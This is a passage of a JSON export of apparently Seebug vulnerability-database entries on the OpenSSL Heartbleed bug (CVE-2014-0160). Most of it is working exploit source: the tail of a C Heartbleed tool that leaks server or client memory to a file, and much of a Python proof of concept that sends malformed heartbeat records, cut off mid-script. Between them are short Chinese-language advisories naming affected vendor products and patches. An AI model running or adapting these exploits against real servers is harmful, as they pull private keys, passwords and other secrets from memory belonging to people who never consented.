packets recieved\\n&#34;);\r\n\t\texit(0);\r\n\t}\r\n\treturn;\r\n}\r\n\r\nvoid usage(){\r\n\tprintf(&#34;[\\n&#34;);\r\n\tprintf(&#34;[ --server|-s &#60;ip/dns&#62;    - the server to target\\n&#34;);\r\n\tprintf(&#34;[ --port|-p   &#60;port&#62;      - the port to target\\n&#34;);\r\n\tprintf(&#34;[ --file|-f   &#60;filename&#62;  - file to write data to\\n&#34;);\r\n\tprintf(&#34;[ --bind|-b   &#60;ip&#62;        - bind to ip for exploiting clients\\n&#34;);\r\n\tprintf(&#34;[ --precmd|-c &#60;n&#62;         - send precmd buffer (STARTTLS)\\n&#34;);\r\n\tprintf(&#34;[\t\t\t    0 = SMTP\\n&#34;);\r\n\tprintf(&#34;[\t\t\t    1 = POP3\\n&#34;);\r\n\tprintf(&#34;[\t\t\t    2 = IMAP\\n&#34;);\r\n\tprintf(&#34;[ --loop|-l\t\t  - loop the exploit attempts\\n&#34;);\r\n\tprintf(&#34;[ --type|-t   &#60;n&#62;         - select exploit to try\\n&#34;);\r\n\tprintf(&#34;[                           0 = null length\\n&#34;);\r\n\tprintf(&#34;[\t\t\t    1 = max leak\\n&#34;);\r\n\tprintf(&#34;[\t\t\t    n = heartbeat payload_length\\n&#34;);\r\n\tprintf(&#34;[\\n&#34;);\r\n\tprintf(&#34;[ --verbose|-v            - output leak to screen\\n&#34;);\r\n\tprintf(&#34;[ --help|-h               - this output\\n&#34;);\r\n\tprintf(&#34;[\\n&#34;);\r\n\texit(0);\r\n}\r\n\r\nint main(int argc, char* argv[]){\r\n\tint ret, port, userc, index;\r\n\tint type = 1, udp = 0, verbose = 0, bind = 0, precmd = 9;\r\n\tint loop = 0;\r\n\tstruct hostent *h;\r\n\tconnection* c;\r\n\tchar *host, *file;\r\n\tint ihost = 0, iport = 0, ifile = 0, itype = 0, iprecmd = 0;\r\n\tprintf(&#34;[ heartbleed - CVE-2014-0160 - OpenSSL information leak exploit\\n&#34;);\r\n\tprintf(&#34;[ =============================================================\\n&#34;);\r\n        static struct option options[] = {\r\n        \t{&#34;server&#34;, 1, 0, &#39;s&#39;},\r\n\t        {&#34;port&#34;, 1, 0, &#39;p&#39;},\r\n\t\t{&#34;file&#34;, 1, 0, &#39;f&#39;},\r\n\t\t{&#34;type&#34;, 1, 0, &#39;t&#39;},\r\n\t\t{&#34;bind&#34;, 1, 0, &#39;b&#39;},\r\n\t\t{&#34;verbose&#34;, 0, 0, &#39;v&#39;},\r\n\t\t{&#34;precmd&#34;, 1, 0, &#39;c&#39;},\r\n\t\t{&#34;loop&#34;, 0, 0, &#39;l&#39;},\r\n\t\t{&#34;help&#34;, 0, 0,&#39;h&#39;}\r\n        };\r\n\twhile(userc != -1) {\r\n\t        userc = getopt_long(argc,argv,&#34;s:p:f:t:b:c:lvh&#34;,options,&index);\t\r\n        \tswitch(userc) {\r\n               \t\tcase -1:\r\n\t                        break;\r\n        \t        case &#39;s&#39;:\r\n\t\t\t\tif(ihost==0){\r\n\t\t\t\t\tihost = 1;\r\n\t\t\t\t\th = gethostbyname(optarg);\t\t\t\t\r\n\t\t\t\t\tif(h==NULL){\r\n\t\t\t\t\t\tprintf(&#34;[!] FATAL: unknown host &#39;%s&#39;\\n&#34;,optarg);\r\n\t\t\t\t\t\texit(1);\r\n\t\t\t\t\t}\r\n\t\t\t\t\thost = malloc(strlen(optarg) + 1);\r\n\t\t\t\t\tif(host==NULL){\r\n                \t\t\t\tprintf(&#34;[ error in malloc()\\n&#34;);\r\n\t\t\t\t                exit(0);\r\n        \t\t\t\t}\r\n\t\t\t\t\tsprintf(host,&#34;%s&#34;,optarg);\r\n               \t\t\t}\r\n\t\t\t\tbreak;\r\n\t                case &#39;p&#39;:\r\n\t\t\t\tif(iport==0){\r\n\t\t\t\t\tport = atoi(optarg);\r\n\t\t\t\t\tiport = 1;\r\n\t\t\t\t}\r\n                \t        break;\r\n\t\t\tcase &#39;f&#39;:\r\n\t\t\t\tif(ifile==0){\r\n\t\t\t\t\tfile = malloc(strlen(optarg) + 1);\r\n\t\t\t\t\tif(file==NULL){\r\n\t\t\t\t                printf(&#34;[ error in malloc()\\n&#34;);\r\n                \t\t\t\texit(0);\r\n        \t\t\t\t}\r\n\t\t\t\t\tsprintf(file,&#34;%s&#34;,optarg);\r\n\t\t\t\t\tifile = 1;\r\n\t\t\t\t}\r\n\t\t\t\tbreak;\r\n\t\t\tcase &#39;t&#39;:\r\n\t\t\t\tif(itype==0){\r\n\t\t\t\t\ttype = atoi(optarg);\r\n\t\t\t\t\titype = 1;\r\n\t\t\t\t}\r\n\t\t\t\tbreak;\r\n\t\t\tcase &#39;h&#39;:\r\n\t\t\t\tusage();\r\n\t\t\t\tbreak;\r\n\t\t\tcase &#39;b&#39;:\r\n\t\t\t\tif(ihost==0){\r\n\t\t\t\t\tihost = 1;\r\n\t\t\t\t\thost = malloc(strlen(optarg)+1);\r\n\t\t\t\t\tif(host==NULL){\r\n\t\t\t \t                printf(&#34;[ error in malloc()\\n&#34;);\r\n\t\t\t\t                exit(0);\r\n\t\t\t\t        }\r\n\t\t\t\t\tsprintf(host,&#34;%s&#34;,optarg);\r\n\t\t\t\t\tbind = 1;\r\n\t\t\t\t}\r\n\t\t\t\tbreak;\r\n\t\t\tcase &#39;c&#39;:\r\n\t\t\t\tif(iprecmd == 0){\r\n\t\t\t\t\tiprecmd = 1;\r\n\t\t\t\t\tprecmd = atoi(optarg);\r\n\t\t\t\t}\r\n\t\t\t\tbreak;\r\n\t\t\tcase &#39;v&#39;:\r\n\t\t\t\tverbose = 1;\r\n\t\t\t\tbreak;\r\n\t\t\tcase &#39;l&#39;:\r\n\t\t\t\tloop = 1;\r\n\t\t\t\tbreak;\r\n\t\t\tdefault:\r\n\t\t\t\tbreak;\r\n\t\t}\r\n\t}\r\n\tif(ihost==0||iport==0||ifile==0||itype==0||type &#60; 0){\r\n\t\tprintf(&#34;[ try --help\\n&#34;);\r\n\t\texit(0);\r\n\t}\r\n\tssl_init();\r\n\tif(bind==0){\r\n\t\tret = tcp_connect(host, port);\r\n\t\tpre_cmd(ret, precmd, verbose);\r\n\t\tc = tls_connect(ret);\r\n\t\theartbleed(c,type);\r\n\t\twhile(repeat==1){\r\n\t\t\tsneakyleaky(c,file,verbose);\r\n\t\t}\r\n\t\twhile(loop==1){\r\n\t\t\tprintf(&#34;[ entered heartbleed loop\\n&#34;);\r\n\t\t\tfirst=0;\r\n\t\t\trepeat=1;\r\n\t\t\theartbleed(c,type);\r\n\t\t\twhile(repeat==1){\r\n\t\t\t\tsneakyleaky(c,file,verbose);\r\n\t\t\t}\r\n\t\t}\r\n\t\tprintf(&#34;[ done.\\n&#34;);\r\n\t\texit(0);\r\n\t}\r\n\telse{\r\n\t\tint sd, pid, i;\r\n\t\tret = tcp_bind(host, port);\r\n\t\twhile(1){\r\n      \t\t\tsd=accept(ret,0,0);\r\n\t\t\tif(sd==-1){\r\n\t\t\t\tprintf(&#34;[!] FATAL: problem with accept()\\n&#34;);\r\n\t\t\t\texit(0);\r\n\t\t\t}\r\n\t\t\tif(pid=fork()){\r\n\t\t\t\tclose(sd);\r\n\t\t\t}\r\n      \t\t\telse{\r\n\t\t\t\tc = tls_bind(sd);\r\n\t\t\t\tpre_cmd(ret, precmd, verbose);\r\n\t\t\t\theartbleed(c,type);\r\n\t\t\t\twhile(repeat==1){\r\n\t\t\t\t\tsneakyleaky(c,file,verbose);\r\n\t\t\t\t}\r\n\t\t\t\twhile(loop==1){\r\n\t\t\t\t\tprintf(&#34;[ entered heartbleed loop\\n&#34;);\r\n\t\t\t\t\tfirst=0;\r\n\t\t\t\t\trepeat=0;\r\n\t\t\t\t\theartbleed(c,type);\r\n\t\t\t\t\twhile(repeat==1){\r\n\t\t\t\t\t\tsneakyleaky(c,file,verbose);\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t\tprintf(&#34;[ done.\\n&#34;);\r\n\t\t\t\texit(0);\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n}\n                              ",
            "cvss": {
                "score": 5.0,
                "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"
            },
            "sourceHref": "https://www.seebug.org/vuldb/ssvid-86061"
        },
        {
            "lastseen": "2017-11-19T17:31:20",
            "description": "CVE ID:CVE-2014-0160\r\n\r\nSAP Sybase SQL Anywhere\u662f\u4e00\u5957\u5168\u9762\u7684\u89e3\u51b3\u65b9\u6848,\u5b83\u63d0\u4f9b\u4e86\u6570\u636e\u7ba1\u7406\u3001\u540c\u6b65\u548c\u6570\u636e\u4ea4\u6362\u6280\u672f,\u53ef\u5feb\u901f\u5728\u8fdc\u7a0b\u548c\u79fb\u52a8\u73af\u5883\u4e2d\u5f00\u53d1\u5e76\u914d\u7f6e\u6570\u636e\u5e93\u9a71\u52a8\u7684\u5e94\u7528\u7a0b\u5e8f\u3002\r\n\r\nSAP Sybase SQL Anywhere\u6240\u7ed1\u5b9a\u7684OpenSSL\u5b58\u5728\u5b89\u5168\u6f0f\u6d1e\uff0cOpenSSL\u5904\u7406TLS\u201d\u5fc3\u8df3\u201c\u6269\u5c55\u5b58\u5728\u4e00\u4e2a\u8fb9\u754c\u9519\u8bef\uff0c\u5141\u8bb8\u653b\u51fb\u8005\u5229\u7528\u6f0f\u6d1e\u83b7\u53d664k\u5927\u5c0f\u7684\u5df2\u94fe\u63a5\u5ba2\u6237\u7aef\u6216\u670d\u52a1\u5668\u7684\u5185\u5b58\u5185\u5bb9\u3002\u5185\u5b58\u4fe1\u606f\u53ef\u5305\u62ec\u79c1\u94a5\uff0c\u7528\u6237\u540d\u5bc6\u7801\u7b49\u3002\n0\nSAP Sybase SQL Anywhere 12.x\r\nSAP Sybase SQL Anywhere 16.x\nSAP Sybase SQL Anywhere 12.01 ebf 4099\u621616.0 ebf 1881\u7248\u672c\u5df2\u4fee\u590d\u8be5\u6f0f\u6d1e\uff0c\u5efa\u8bae\u7528\u6237\u4e0b\u8f7d\u4f7f\u7528\uff1a\r\nhttp://www.sap.com",
            "published": "2014-04-21T00:00:00",
            "title": "SAP Sybase SQL Anywhere OpenSSL TLS\u5fc3\u8df3\u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e",
            "type": "seebug",
            "bulletinFamily": "exploit",
            "cvelist": [
                "CVE-2014-0160"
            ],
            "modified": "2014-04-21T00:00:00",
            "href": "https://www.seebug.org/vuldb/ssvid-62244",
            "id": "SSV:62244",
            "sourceData": "",
            "cvss": {
                "score": 5.0,
                "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"
            },
            "sourceHref": ""
        },
        {
            "lastseen": "2017-11-19T17:26:26",
            "description": "CVE ID:CVE-2014-0160\r\n\r\nF-Secure E-mail/Server Security/F-Secure Server Security\u4ea7\u54c1\u5b58\u5728\u5b89\u5168\u6f0f\u6d1e\u3002\r\n\r\nF-Secure E-mail/Server Security/F-Secure Server Security\u6240\u7ed1\u5b9a\u7684OpenSSL\u5b58\u5728\u5b89\u5168\u6f0f\u6d1e\uff0cOpenSSL\u5904\u7406TLS\u201d\u5fc3\u8df3\u201c\u6269\u5c55\u5b58\u5728\u4e00\u4e2a\u8fb9\u754c\u9519\u8bef\uff0c\u5141\u8bb8\u653b\u51fb\u8005\u5229\u7528\u6f0f\u6d1e\u83b7\u53d664k\u5927\u5c0f\u7684\u5df2\u94fe\u63a5\u5ba2\u6237\u7aef\u6216\u670d\u52a1\u5668\u7684\u5185\u5b58\u5185\u5bb9\u3002\u5185\u5b58\u4fe1\u606f\u53ef\u5305\u62ec\u79c1\u94a5\uff0c\u7528\u6237\u540d\u5bc6\u7801\u7b49\u3002\n0\nF-Secure E-mail and Server Security 10.x\r\nF-Secure E-mail and Server Security 11.x\r\nF-Secure Server Security 10.x\r\nF-Secure Server Security 11.x\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u6f0f\u6d1e\uff0c\u8bf7\u4e0b\u8f7d\u4f7f\u7528\uff1a\r\nhttp://www.f-secure.com/en/web/labs_global/fsc-2014-1",
            "published": "2014-04-16T00:00:00",
            "title": "F-Secure E-mail/Server Security OpenSSL TLS/DTLS\u5fc3\u8df3\u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e",
            "type": "seebug",
            "bulletinFamily": "exploit",
            "cvelist": [
                "CVE-2014-0160"
            ],
            "modified": "2014-04-16T00:00:00",
            "href": "https://www.seebug.org/vuldb/ssvid-62185",
            "id": "SSV:62185",
            "sourceData": "",
            "cvss": {
                "score": 5.0,
                "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"
            },
            "sourceHref": ""
        },
        {
            "lastseen": "2017-11-19T17:26:30",
            "description": "CVE ID:CVE-2014-0160\r\n\r\nMcAfee Email Gateway\u662f\u4e00\u6b3e\u5168\u9762\u7684\u7535\u5b50\u90ae\u4ef6\u5b89\u5168\u89e3\u51b3\u65b9\u6848\u3002\r\n\r\nMcAfee Email Gateway\u6240\u7ed1\u5b9a\u7684OpenSSL\u5b58\u5728\u5b89\u5168\u6f0f\u6d1e\uff0cOpenSSL\u5904\u7406TLS\u201d\u5fc3\u8df3\u201c\u6269\u5c55\u5b58\u5728\u4e00\u4e2a\u8fb9\u754c\u9519\u8bef\uff0c\u5141\u8bb8\u653b\u51fb\u8005\u5229\u7528\u6f0f\u6d1e\u83b7\u53d664k\u5927\u5c0f\u7684\u5df2\u94fe\u63a5\u5ba2\u6237\u7aef\u6216\u670d\u52a1\u5668\u7684\u5185\u5b58\u5185\u5bb9\u3002\u5185\u5b58\u4fe1\u606f\u53ef\u5305\u62ec\u79c1\u94a5\uff0c\u7528\u6237\u540d\u5bc6\u7801\u7b49\u3002\n0\nMcAfee Email Gateway 7.x\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u6f0f\u6d1e\uff0c\u8bf7\u4e0b\u8f7d\u4f7f\u7528\uff1a\r\nhttps://kc.mcafee.com/corporate/index?page=content&amp;id=SB10071",
            "published": "2014-04-16T00:00:00",
            "title": "McAfee Email Gateway OpenSSL TLS\u5fc3\u8df3\u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e",
            "type": "seebug",
            "bulletinFamily": "exploit",
            "cvelist": [
                "CVE-2014-0160"
            ],
            "modified": "2014-04-16T00:00:00",
            "href": "https://www.seebug.org/vuldb/ssvid-62192",
            "id": "SSV:62192",
            "sourceData": "",
            "cvss": {
                "score": 5.0,
                "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"
            },
            "sourceHref": ""
        },
        {
            "lastseen": "2018-07-03T19:22:26",
            "description": "CVE ID:CVE-2014-0160\r\n\r\nWatchGuard Fireware XTM\u662f\u4e00\u6b3e\u9632\u706b\u5899\u8bbe\u5907\u3002 \r\n\r\nWatchGuard Fireware XTM\u6240\u7ed1\u5b9a\u7684OpenSSL\u5b58\u5728\u5b89\u5168\u6f0f\u6d1e\uff0cOpenSSL\u5904\u7406TLS\u201d\u5fc3\u8df3\u201c\u6269\u5c55\u5b58\u5728\u4e00\u4e2a\u8fb9\u754c\u9519\u8bef\uff0c\u5141\u8bb8\u653b\u51fb\u8005\u5229\u7528\u6f0f\u6d1e\u83b7\u53d664k\u5927\u5c0f\u7684\u5df2\u94fe\u63a5\u5ba2\u6237\u7aef\u6216\u670d\u52a1\u5668\u7684\u5185\u5b58\u5185\u5bb9\u3002\u5185\u5b58\u4fe1\u606f\u53ef\u5305\u62ec\u79c1\u94a5\uff0c\u7528\u6237\u540d\u5bc6\u7801\u7b49\u3002\n0\nWatchGuard Fireware XTM 11.x\nWatchGuard Fireware XTM 11.8.3 Update 1\u7248\u672c\u5df2\u4fee\u590d\u8be5\u6f0f\u6d1e\uff0c\u5efa\u8bae\u7528\u6237\u4e0b\u8f7d\u4f7f\u7528\uff1a\r\nhttp://watchguardsecuritycenter.com",
            "published": "2014-04-21T00:00:00",
            "type": "seebug",
            "title": "Watchguard Fireware XTM OpenSSL TLS\u5fc3\u8df3\u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e",
            "bulletinFamily": "exploit",
            "cvelist": [
                "CVE-2014-0160"
            ],
            "modified": "2014-04-21T00:00:00",
            "id": "SSV:62245",
            "href": "https://www.seebug.org/vuldb/ssvid-62245",
            "sourceData": "",
            "cvss": {
                "score": 5.0,
                "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"
            },
            "sourceHref": ""
        },
        {
            "lastseen": "2017-11-19T17:26:16",
            "description": "CVE ID:CVE-2014-0160\r\n\r\nBarracuda\u591a\u4e2a\u4ea7\u54c1\u5b58\u5728\u5b89\u5168\u6f0f\u6d1e\u3002\r\n\r\nBarracuda\u6240\u7ed1\u5b9a\u7684OpenSSL\u5b58\u5728\u5b89\u5168\u6f0f\u6d1e\uff0cOpenSSL\u5904\u7406TLS\u201d\u5fc3\u8df3\u201c\u6269\u5c55\u5b58\u5728\u4e00\u4e2a\u8fb9\u754c\u9519\u8bef\uff0c\u5141\u8bb8\u653b\u51fb\u8005\u5229\u7528\u6f0f\u6d1e\u83b7\u53d664k\u5927\u5c0f\u7684\u5df2\u94fe\u63a5\u5ba2\u6237\u7aef\u6216\u670d\u52a1\u5668\u7684\u5185\u5b58\u5185\u5bb9\u3002\u5185\u5b58\u4fe1\u606f\u53ef\u5305\u62ec\u79c1\u94a5\uff0c\u7528\u6237\u540d\u5bc6\u7801\u7b49\u3002\n0\nBarracuda CudaTel Communication Server 2.x\r\nBarracuda CudaTel Communication Server 3.x\r\nBarracuda Firewall 6.x\r\nBarracuda Link Balancer 2.x\r\nBarracuda Load Balancer\r\nBarracuda Load Balancer 4.x\r\nBarracuda Load Balancer ADC 5.x\r\nBarracuda Message Archiver\r\nBarracuda Message Archiver 3.x\r\nBarracuda Web Application Firewall 7.x\r\nBarracuda Web Filter\r\nBarracuda Web Filter 7.x\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u6f0f\u6d1e\uff0c\u8bf7\u4e0b\u8f7d\u4f7f\u7528\uff1a\r\nhttps://www.barracuda.com/blogs/pmblog?bid=2279",
            "published": "2014-04-16T00:00:00",
            "title": "Barracuda\u591a\u4e2a\u4ea7\u54c1OpenSSL TLS/DTLS\u5fc3\u8df3\u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e",
            "type": "seebug",
            "bulletinFamily": "exploit",
            "cvelist": [
                "CVE-2014-0160"
            ],
            "modified": "2014-04-16T00:00:00",
            "href": "https://www.seebug.org/vuldb/ssvid-62181",
            "id": "SSV:62181",
            "sourceData": "",
            "cvss": {
                "score": 5.0,
                "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"
            },
            "sourceHref": ""
        },
        {
            "lastseen": "2017-11-19T17:26:53",
            "description": "CVE ID:CVE-2014-0160\r\n\r\nMcAfee Endpoint Intelligence Agent\u662f\u4e00\u6b3eMcAfee\u4ea7\u54c1\u4e2d\u6240\u4f7f\u7528\u7684\u4e00\u4e2a\u7f51\u7edc\u670d\u52a1\u3002 \r\n\r\nMcAfee Endpoint Intelligence Agent\u6240\u7ed1\u5b9a\u7684OpenSSL\u5b58\u5728\u5b89\u5168\u6f0f\u6d1e\uff0cOpenSSL\u5904\u7406TLS\u201d\u5fc3\u8df3\u201c\u6269\u5c55\u5b58\u5728\u4e00\u4e2a\u8fb9\u754c\u9519\u8bef\uff0c\u5141\u8bb8\u653b\u51fb\u8005\u5229\u7528\u6f0f\u6d1e\u83b7\u53d664k\u5927\u5c0f\u7684\u5df2\u94fe\u63a5\u5ba2\u6237\u7aef\u6216\u670d\u52a1\u5668\u7684\u5185\u5b58\u5185\u5bb9\u3002\u5185\u5b58\u4fe1\u606f\u53ef\u5305\u62ec\u79c1\u94a5\uff0c\u7528\u6237\u540d\u5bc6\u7801\u7b49\u3002\n0\nMcAfee Endpoint Intelligence Agent 1.x (Formerly Network Integrity Agent)\nMcAfee Endpoint Intelligence Agent 2.2.1\u7248\u672c\u5df2\u4fee\u590d\u8be5\u6f0f\u6d1e\uff0c\u5efa\u8bae\u7528\u6237\u4e0b\u8f7d\u4f7f\u7528\uff1a\r\nhttp://www.mcafee.com",
            "published": "2014-04-21T00:00:00",
            "title": "McAfee Endpoint Intelligence Agent OpenSSL TLS\u5fc3\u8df3\u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e",
            "type": "seebug",
            "bulletinFamily": "exploit",
            "cvelist": [
                "CVE-2014-0160"
            ],
            "modified": "2014-04-21T00:00:00",
            "href": "https://www.seebug.org/vuldb/ssvid-62238",
            "id": "SSV:62238",
            "sourceData": "",
            "cvss": {
                "score": 5.0,
                "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"
            },
            "sourceHref": ""
        },
        {
            "lastseen": "2017-11-19T17:27:53",
            "description": "CVE ID:CVE-2014-0160\r\n\r\nSophos Antivirus\u662f\u4e00\u6b3e\u9632\u75c5\u6bd2\u5e94\u7528\u7a0b\u5e8f\u3002\r\n\r\nSophos Antivirus for vShield\u6240\u7ed1\u5b9a\u7684OpenSSL\u5b58\u5728\u5b89\u5168\u6f0f\u6d1e\uff0cOpenSSL\u5904\u7406TLS\u201d\u5fc3\u8df3\u201c\u6269\u5c55\u5b58\u5728\u4e00\u4e2a\u8fb9\u754c\u9519\u8bef\uff0c\u5141\u8bb8\u653b\u51fb\u8005\u5229\u7528\u6f0f\u6d1e\u83b7\u53d664k\u5927\u5c0f\u7684\u5df2\u94fe\u63a5\u5ba2\u6237\u7aef\u6216\u670d\u52a1\u5668\u7684\u5185\u5b58\u5185\u5bb9\u3002\u5185\u5b58\u4fe1\u606f\u53ef\u5305\u62ec\u79c1\u94a5\uff0c\u7528\u6237\u540d\u5bc6\u7801\u7b49\u3002\n0\nSophos Antivirus for vShield 1.0\r\nSophos Antivirus for vShield 1.1\n\u76ee\u524d\u6ca1\u6709\u8be6\u7ec6\u89e3\u51b3\u65b9\u6848\uff1a\r\nhttp://www.sophos.com",
            "published": "2014-04-16T00:00:00",
            "title": "Sophos Antivirus for vShield OpenSSL TLS\u5fc3\u8df3\u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e",
            "type": "seebug",
            "bulletinFamily": "exploit",
            "cvelist": [
                "CVE-2014-0160"
            ],
            "modified": "2014-04-16T00:00:00",
            "href": "https://www.seebug.org/vuldb/ssvid-62197",
            "id": "SSV:62197",
            "sourceData": "",
            "cvss": {
                "score": 5.0,
                "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"
            },
            "sourceHref": ""
        },
        {
            "lastseen": "2017-11-19T13:55:16",
            "description": "No description provided by source.",
            "published": "2014-07-01T00:00:00",
            "title": "OpenSSL 1.0.1f TLS Heartbeat Extension - Memory Disclosure (Multiple SSL/TLS versions)",
            "type": "seebug",
            "bulletinFamily": "exploit",
            "cvelist": [
                "CVE-2014-0160"
            ],
            "modified": "2014-07-01T00:00:00",
            "href": "https://www.seebug.org/vuldb/ssvid-86038",
            "id": "SSV:86038",
            "sourceData": "\n                                                # Exploit Title: [OpenSSL TLS Heartbeat Extension - Memory Disclosure - Multiple SSL/TLS versions]\r\n# Date: [2014-04-09]\r\n# Exploit Author: [Csaba Fitzl]\r\n# Vendor Homepage: [http://www.openssl.org/]\r\n# Software Link: [http://www.openssl.org/source/openssl-1.0.1f.tar.gz]\r\n# Version: [1.0.1f]\r\n# Tested on: [N/A]\r\n# CVE : [2014-0160]\r\n\r\n\r\n#!/usr/bin/env python\r\n\r\n# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford ([email protected])\r\n# The author disclaims copyright to this source code.\r\n# Modified by Csaba Fitzl for multiple SSL / TLS version support\r\n\r\nimport sys\r\nimport struct\r\nimport socket\r\nimport time\r\nimport select\r\nimport re\r\nfrom optparse import OptionParser\r\n\r\noptions = OptionParser(usage=&#39;%prog server [options]&#39;, description=&#39;Test for SSL heartbeat vulnerability (CVE-2014-0160)&#39;)\r\noptions.add_option(&#39;-p&#39;, &#39;--port&#39;, type=&#39;int&#39;, default=443, help=&#39;TCP port to test (default: 443)&#39;)\r\n\r\ndef h2bin(x):\r\n\treturn x.replace(&#39; &#39;, &#39;&#39;).replace(&#39;\\n&#39;, &#39;&#39;).decode(&#39;hex&#39;)\r\n\r\nversion = []\r\nversion.append([&#39;SSL 3.0&#39;,&#39;03 00&#39;])\r\nversion.append([&#39;TLS 1.0&#39;,&#39;03 01&#39;])\r\nversion.append([&#39;TLS 1.1&#39;,&#39;03 02&#39;])\r\nversion.append([&#39;TLS 1.2&#39;,&#39;03 03&#39;])\r\n\r\ndef create_hello(version):\r\n\thello = h2bin(&#39;16 &#39; + version + &#39; 00 dc 01 00 00 d8 &#39; + version + &#39;&#39;&#39; 53\r\n43 5b 90 9d 9b 72 0b bc  0c bc 2b 92 a8 48 97 cf\r\nbd 39 04 cc 16 0a 85 03  90 9f 77 04 33 d4 de 00\r\n00 66 c0 14 c0 0a c0 22  c0 21 00 39 00 38 00 88\r\n00 87 c0 0f c0 05 00 35  00 84 c0 12 c0 08 c0 1c\r\nc0 1b 00 16 00 13 c0 0d  c0 03 00 0a c0 13 c0 09\r\nc0 1f c0 1e 00 33 00 32  00 9a 00 99 00 45 00 44\r\nc0 0e c0 04 00 2f 00 96  00 41 c0 11 c0 07 c0 0c\r\nc0 02 00 05 00 04 00 15  00 12 00 09 00 14 00 11\r\n00 08 00 06 00 03 00 ff  01 00 00 49 00 0b 00 04\r\n03 00 01 02 00 0a 00 34  00 32 00 0e 00 0d 00 19\r\n00 0b 00 0c 00 18 00 09  00 0a 00 16 00 17 00 08\r\n00 06 00 07 00 14 00 15  00 04 00 05 00 12 00 13\r\n00 01 00 02 00 03 00 0f  00 10 00 11 00 23 00 00\r\n00 0f 00 01 01\r\n&#39;&#39;&#39;)\r\n\treturn hello\r\n\r\ndef create_hb(version):\r\n\thb = h2bin(&#39;18 &#39; + version + &#39; 00 03 01 40 00&#39;)\r\n\treturn hb\r\n\r\ndef hexdump(s):\r\n\tfor b in xrange(0, len(s), 16):\r\n\t\tlin = [c for c in s[b : b + 16]]\r\n\t\thxdat = &#39; &#39;.join(&#39;%02X&#39; % ord(c) for c in lin)\r\n\t\tpdat = &#39;&#39;.join((c if 32 &#60;= ord(c) &#60;= 126 else &#39;.&#39; )for c in lin)\r\n\t\tprint &#39;  %04x: %-48s %s&#39; % (b, hxdat, pdat)\r\n\tprint\r\n\r\ndef recvall(s, length, timeout=5):\r\n\tendtime = time.time() + timeout\r\n\trdata = &#39;&#39;\r\n\tremain = length\r\n\twhile remain &#62; 0:\r\n\t\trtime = endtime - time.time()\r\n\t\tif rtime &#60; 0:\r\n\t\t\treturn None\r\n\t\tr, w, e = select.select([s], [], [], 5)\r\n\t\tif s in r:\r\n\t\t\tdata = s.recv(remain)\r\n\t\t\t# EOF?\r\n\t\t\tif not data:\r\n\t\t\t\treturn None\r\n\t\t\trdata += data\r\n\t\t\tremain -= len(data)\r\n\treturn rdata\r\n\r\n\r\ndef recvmsg(s):\r\n\thdr = recvall(s, 5)\r\n\tif hdr is None:\r\n\t\tprint &#39;Unexpected EOF receiving record header - server closed connection&#39;\r\n\t\treturn None, None, None\r\n\ttyp, ver, ln = struct.unpack(&#39;&#62;BHH&#39;, hdr)\r\n\tpay = recvall(s, ln, 10)\r\n\tif pay is None:\r\n\t\tprint &#39;Unexpected EOF receiving record payload - server closed connection&#39;\r\n\t\treturn None, None, None\r\n\tprint &#39; ... received message: type = %d, ver = %04x, length = %d&#39; % (typ, ver, len(pay))\r\n\treturn typ, ver, pay\r\n\r\ndef hit_hb(s,hb):\r\n\ts.send(hb)\r\n\twhile True:\r\n\t\ttyp, ver, pay = recvmsg(s)\r\n\t\tif typ is None:\r\n\t\t\tprint &#39;No heartbeat response received, server likely not vulnerable&#39;\r\n\t\t\treturn False\r\n\r\n\t\tif typ == 24:\r\n\t\t\tprint &#39;Received heartbeat response:&#39;\r\n\t\t\thexdump(pay)\r\n\t\t\tif len(pay) &#62; 3:\r\n\t\t\t\tprint &#39;WARNING: server returned more data than it should - server is vulnerable!&#39;\r\n\t\t\telse:\r\n\t\t\t\tprint &#39;Server processed malformed heartbeat, but did not return any extra data.&#39;\r\n\t\t\treturn True\r\n\r\n\t\tif typ == 21:\r\n\t\t\tprint &#39;Received alert:&#39;\r\n\t\t\thexdump(pay)\r\n\t\t\tprint &#39;Server returned error, likely not vulnerable&#39;\r\n\t\t\treturn False\r\n\r\ndef main():\r\n\topts, args = options.parse_args()\r\n\tif len(args) &#60; 1:\r\n\t\toptions.print_help()\r\n\t\treturn\r\n\tfor i in range(len(version)):\r\n\t\tprint &#39;Trying &#39; + version[i][0] + &#39;...&#39;\r\n\t\ts = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n\t\tprint &#39;Connecting...&#39;\r\n\t\tsys.stdout.flush()\r\n\t\ts.connect((args[0], opts.port))\r\n\t\tprint &#39;Sending Client Hello...&#39;\r\n\t\tsys.stdout.flush()\r\n\t\ts.send(create_hello(version[i][1]))\r\n\t\tprint &#39;Waiting for Server Hello...&#39;\r\n\t\tsys.stdout.flush()\r\n\t\twhile True:\r\n\t\t\ttyp, ver, pay = 